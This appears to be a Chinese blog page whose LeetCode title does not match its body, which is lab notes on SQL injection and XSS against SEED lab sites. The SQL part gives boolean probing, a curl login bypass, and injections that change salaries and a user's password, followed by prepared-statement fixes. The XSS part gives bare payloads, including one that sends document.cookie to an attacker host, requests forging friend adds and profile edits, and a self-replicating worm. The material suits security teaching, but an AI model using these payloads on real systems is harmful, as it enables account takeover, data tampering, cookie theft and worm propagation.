leetcode 每日一题 462. 最少移动
922 2023-04-03 04:05:40
yyy修改为yyy' 造成SQL出错,动态页面返回错误提示信息。
yyy修改为yyy and 1=1 不对查询条件造成任何影响,返回正常页面。
yyy修改为yyy and 1=2 查询不到任何信息。
利用数据库服务器的系统变量。
利用数据库服务器的系统表进行判断。
猜解后台口令表表名。
猜解字段名。
猜解字段值: 二分法逼近。
口令可能为MD5散列后的密文。
Wposion:能够在动态Web文档中找出SQL注入漏洞的工具。
mieliekoek.pl:以网站镜像工具生成的输出为输入,找出含有表单页面。
SPIKE Proxy工具:允许使用者对待注入字符串进行定制。
SPI Toolkit工具包中的“SQL Injector”工具。
输入验证: 对用户提交数据进行尽可能严格的验证与过滤。
输出净化: HTMLEncode()方法。
消除危险的输入点。
SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email, nickname, Password FROM credential WHERE name= '$input_name' and Password='$hashed_pwd';
curl 'www.seedlabsqlinjection.com/unsafe_home.php?username=admin%27%20%23'
', salary='999666' where EID='10000';#
', salary='0.1' where name='Boby';#
(这数据还是个整形保存)', Password='(sha1值)' where Name='Boby';#
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?"); $sql->bind_param("???", $input_uname, $hashed_pwd); $sql->execute(); $sql->bind_result($id, $name, $eid, $salary, $birth, $ssn, $phoneNumber, $address, $email, $nickname, $pwd); $sql->fetch(); $sql->close();
if($input_pwd!=''){ // In case password field is not empty. $hashed_pwd = sha1($input_pwd); //Update the password stored in the session. $_SESSION['pwd']=$hashed_pwd; $sql = $conn->prepare("UPDATE credential SET nickname= ?,email= ?,address= ?,Password= ?,PhoneNumber= ? where ID=$id;"); $sql->bind_param("xxxxx",$input_nickname,$input_email,$input_address,$hashed_pwd,$input_phonenumber); $sql->execute(); $sql->close(); }else{ // if passowrd field is empty. $sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;"); $sql->bind_param("xxxx",$input_nickname,$input_email,$input_address,$input_phonenumber); $sql->execute(); $sql->close(); }
<script>alert('XSS');</script>
代码并保存。<script> alert(document.cookie);</script>
<script>document.write('<img src=http://ip+端口?c='+escape(document.cookie) + ' >');</script>
<script type="text/javascript">window.onload = function () { var Ajax=null;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token; //Construct the HTTP request to add Samy as a friend.var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44"+ts+token;//Create and send Ajax request to add friendAjax=new XMLHttpRequest();Ajax.open("GET",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); Ajax.send();} </script>
<script type="text/javascript">window.onload = function(){ //JavaScript code to access user name, user guid, Time Stamp __elgg_ts //and Security Token __elgg_tokenvar userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token; var content=token+ts+"name="+userName+"&description=<p>hello my friends~.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid; var sendurl = "http://www.xsslabelgg.com/action/profile/edit"; var samyGuid=44; if(elgg.session.user.guid!=samyGuid){ //Create and send Ajax request to modify profile var Ajax=null; Ajax=new XMLHttpRequest(); Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); Ajax.send(content); }}</script>
<script id="worm" type="text/javascript">window.onload = function(){var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";var jsCode = document.getElementById("worm").innerHTML;var tailTag = "</" + "script>"; var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);var userName=elgg.session.user.name;var guid="&guid="+elgg.session.user.guid;var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;var token="&__elgg_token="+elgg.security.token.__elgg_token;//Construct the content of your url.var content= token + ts + "&name=" + userName + "&description=<p>hello my firends~ "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;var sendurl = "http://www.xsslabelgg.com/action/profile/edit"alert(content)var samyGuid=44;if(elgg.session.user.guid!=samyGuid){var Ajax=null;Ajax=new XMLHttpRequest();Ajax.open("POST",sendurl,true);Ajax.setRequestHeader("Host","www.xsslabelgg.com");Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");Ajax.send(content);}}</script>